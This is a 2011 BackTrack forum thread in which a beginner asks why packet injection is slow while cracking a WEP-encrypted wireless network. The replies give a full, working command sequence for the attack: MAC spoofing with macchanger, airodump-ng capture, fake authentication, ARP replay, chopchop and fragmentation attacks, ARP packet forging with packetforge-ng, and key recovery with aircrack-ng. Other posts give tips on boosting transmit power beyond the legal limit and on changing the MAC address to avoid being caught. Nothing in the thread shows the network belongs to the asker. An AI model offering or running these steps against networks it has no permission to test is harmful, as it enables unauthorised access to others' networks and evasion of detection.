Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

  1. #1
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    Puerto Rico
    Posts
    4

    Default Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Hello to everyone. I have an Asus M2N32SLI DELUXE motherboard that have the RTL8187L chipset integrated.

    1. I am using (and experimenting) with Backtrack 5 R1

    2. I boot from the Backtrack 5 R1 boot DVD from the Post.


    The Problems= I do all the process until the packet injection. But I saw that always the DATA field is receiving data very slowly, although the pps= 499 or 500. I remember that the Tx = -60 or something like that, since I read that this represent the actual voltage set in the Wireless Network card.....

    I want to know if someone knows how to speed up this process, since the instructions for cracking the WEP explain that for start to crack the WEP key we need to have about 20,000 data packets or IV's.

    For example, I wait about 2 hours, and the Data field just have 399 packets, VERY SLOWWWWWWW.

    Well, remember I use the Backtrack 5 R1 boot DVD.

    I wait for an answer.

    Bye

  2. #2
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Just because you're transmitting does not mean you are injecting. You need to try different attacks. If you give me a list of EVERY command, start to finish, that you have used, and what type of network(WEP/SKA/OPEN...) you have used them on, then I'd be more than happy to give you suggestions.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  3. #3
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    if signal strength is low, slowing how many packets per second are being injected can help greatly. You will see less packet drops inn airodump when you're at a good speed.
    use the -x option with aireplay to control the number of PPS. Default is 500, sometimes I might do 200 sometimes I might do 25. Depends on the signal strength and I've seen some routers sort of get overloaded if you hit them too much.

  4. #4
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Again, just because packets are being sent from your card does not mean the AP is responding to them. I've tested many networks, and when the AP wasn't responding, then it wouldn't respond no matter how pps you were sending 1 or 1000. Sending fewer packets only helps when the AP is generating IVs anyway, but can't keep up with you. His AP is not. Otherwise, he'd have a lot more IVs than 399. Therefore, he has not succesfully injected anything. Your best bet is to switch up attacks and hope the router responds to that one. Also again, I'd be very happy to help. I enjoy doing this kind of thing.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  5. #5
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    Puerto Rico
    Posts
    4

    Default Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Hello Mr. ShadowMaster. Thanks for answer. The Wireless network is a WEP based encription. Well, I read you want to see what commands I used when doing all the process, right ?. If so, here is a list of all:

    1. iwconfig

    2. airmon-ng stop [device]

    3. ifconfig [interface] down

    4. macchanger --mac 00:11:22:33:44:66 [device]

    5. airmon-ng start [device]

    6. airodump-ng [device]

    7. airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

    8. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

    9. aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

    10. aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    11. aircrack-ng -n 128 -b [bssid] [filename]-01.cap


    Well, I hope this can help you. But remember that I saw a Power Level (Tx) of only 20 db in my wireless card when I execute the command "iwconfig".


    See you new friend,

    thanks

  6. #6
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    hy,
    -first operation for increase txpower (in MY country is not legal!)
    iw reg set BO ".........livia"
    iwconfig [device :es wlan0] txpower 30
    airmon-ng start wlan0
    ecc......ecc...
    for my little experience an increase in the txpower works well in "receiving data"), but for "normal-connection" is more stable 20db! in my alpha
    bye

  7. #7
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    San Diego, CA
    Posts
    21

    Default Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Try a simple injection test(replace wlan0 with your wireless interface) also you must set your card to monitor mode and to the desired channel with airmon-ng prior to running any of the tests.
    Code:
     aireplay-ng -9 wlan0
    You can also take a look at the documentation:
    Usage

    aireplay-ng -9 -e teddy -a 00:de:ad:ca:fe:00 -i wlan1 wlan0

    Where:

    -9 means injection test. Long form is --test.
    -e teddy is the network name (SSID). This is optional.
    -a 00:de:ad:ca:fe:00 ath0 is MAC address of the access point (BSSID). This is optional.
    -i wlan1 is interface name of the second card if you want to determine which attacks your card supports. This interfaces acts as an AP and receives packets. This is optional.
    wlan0 is the interface name or airserv-ng IP Address plus port number. This interface is used to send packets. For example - 127.0.0.1:666. (Mandatory)
    Sometimes you aren't physically close enough to inject packets, if you have $30 to blow I'd suggest getting an Alfa AWUS036H.

  8. #8
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Quote Originally Posted by joecrank View Post
    Hello Mr. ShadowMaster. Thanks for answer. The Wireless network is a WEP based encription. Well, I read you want to see what commands I used when doing all the process, right ?. If so, here is a list of all:

    1. iwconfig

    2. airmon-ng stop [device]

    3. ifconfig [interface] down

    4. macchanger --mac 00:11:22:33:44:66 [device]

    5. airmon-ng start [device]

    6. airodump-ng [device]

    7. airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

    8. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

    9. aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

    10. aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    11. aircrack-ng -n 128 -b [bssid] [filename]-01.cap


    Well, I hope this can help you. But remember that I saw a Power Level (Tx) of only 20 db in my wireless card when I execute the command "iwconfig".


    See you new friend,

    thanks
    Sorry for the delay. Ok, from what I see you've been using a both an ARP replay and an interactive packet replay. Since you didn't specify, I'm gonna assume no SKA to bypass. So. Try this
    iwconfig

    2. airmon-ng stop [device]

    3. ifconfig [interface] down

    4. macchanger --mac 00:11:22:33:44:66 [device]

    5. airmon-ng start [device]

    6. airodump-ng [device]

    7. airodump-ng -c [channel] -w [network.out] –-bssid [bssid] [device]

    8. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
    now i start running into issues. by default, without the -h, aireplay will use the device mac. Since you've already changed, why keep putting it in? Try it without the -h to see that I'm correct and save yourself a lot of typing. If not, just keep it this way. Moving on...

    9. aireplay-ng -4 -a [bssid] [device] (remember to add -h if I'm wrong)
    if this attack fails then try this one
    9.a aireplay-ng -5 -b [bssid] [device]
    both of these will get you the PRGA XOR stream to forge an arp packet to inject.

    when one of them works, get the .xor file that was outputted (ls, or just read the terminal, itll say after the attack succeeds.)

    now things get complicated. if you used attack -4 (korek chopchop) then use tcpdump to view the saved decrypted packet which is listed in the terminal output)
    tcpdump -s0 -n -e -r [packet] [usually something like packet-dec-xxxx.cap)
    search for the ip address inside the packet and remember it

    if you used packet fragmentation (-5) then its easier but not necessarily as effective. (no arp amplification.)
    You're just gonna use broadcast addresses for the ips.
    for -5
    packetforge-ng -0 -a [bssid] -h [device mac] -k 255.255.255.255 -l 255.255.255.255 -y [.xor file] -w arppac.cap

    for -4
    packetforge-ng -0 -a [bssid] -h [device mac] -k [valid ip on network] -l [use the ip scheme (i.e. 192.168.1.) it should usually be 192.168.[different things] use it to create something like this ipscheme.ipscheme.ipscheme.255 (example 192.168.40.255)] -y [.xor file] -w arppac.cap
    this command is confusing so ill give a full example
    packetforge-ng -0 -a [bssid] -h [device mac] -k 192.168.2.45 -l 192.168.2.255 -y [.xor file] -w arppac.cap

    next
    aireplay-ng -2 -r arppac.cap

    if this doesn't inject, let me know, and we will try another attack.
    if it does inject then wait until at least 20,000 data# then
    aircrack-ng [-w file from airodump-ng]
    Don't use any modifiers, it wont really help, and this way has cracked keys in less then a second for me with 50,000+ and in 5-10 seconds with 10,000-20,000.
    btw the script located http://www.backtrack-linux.org/forum...ifi-101-a.html there should help a lot.
    let me know what you do.
    Last edited by ShadowMaster; 10-23-2011 at 01:36 AM.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  9. #9
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Default Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    ShadowMaster,

    Thank you for the post man! I didn't really get the response I was looking for with my script; but with what you just posted advising people to use my script.... I have a smile the size of Texas across my face. Thank you so much!!!
    V/r,
    Snafu
    Pffbt..[quote]I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. [/quote]

  10. #10
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Default Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Quote Originally Posted by joecrank View Post
    Hello Mr. ShadowMaster. Thanks for answer. The Wireless network is a WEP based encription. Well, I read you want to see what commands I used when doing all the process, right ?. If so, here is a list of all:

    ......
    3. ifconfig [interface] down

    4. macchanger --mac 00:11:22:33:44:66 [device]

    5. airmon-ng start [device]
    If you change the MAC address of the physical device and then use airmon-ng you defeat the purpose of a MAC change =)....do an ifconfig of the physical device and look at the mac, then macchange it....then airmon-ng start it, then ifconfig the virtual device (mon0)....mon0 will have the MAC that is burned into the card =)...You need to do the steps in this order bro =)...Out of sheer curiosity, why are ya changing MACs =)...I only change my MAC when I want to play sneaky games...(i.e....Not be Caught)
    Code:
    airmon-ng start <dev>
    ifconfig <dev> down
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:66 <dev>
    macchanger -m 00:11:22:33:44:66 mon0
    ifconfig <dev> up
    ifconfig mon0 up
    V/r,
    Snafu
    Pffbt..[quote]I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. [/quote]

Page 1 of 2 12 LastLast

Similar Threads

  1. Slowest Packet Injection problems with Backtrack 4 beta and Realtek RTL8187L
    By joecrank in forum BackTrack 5 Beginners Section
    Replies: 1
    Last Post: 10-02-2011, 10:18 AM
  2. Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)
    By verysofttoiletpaper in forum Beginners Forum
    Replies: 7
    Last Post: 04-12-2010, 05:49 AM
  3. Realtek RTL8187L Chipset
    By junkiethumbs in forum OLD Newbie Area
    Replies: 1
    Last Post: 07-19-2009, 09:40 PM
  4. How do you speed up packet injection?
    By heyaz in forum OLD Newbie Area
    Replies: 20
    Last Post: 08-15-2007, 05:36 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •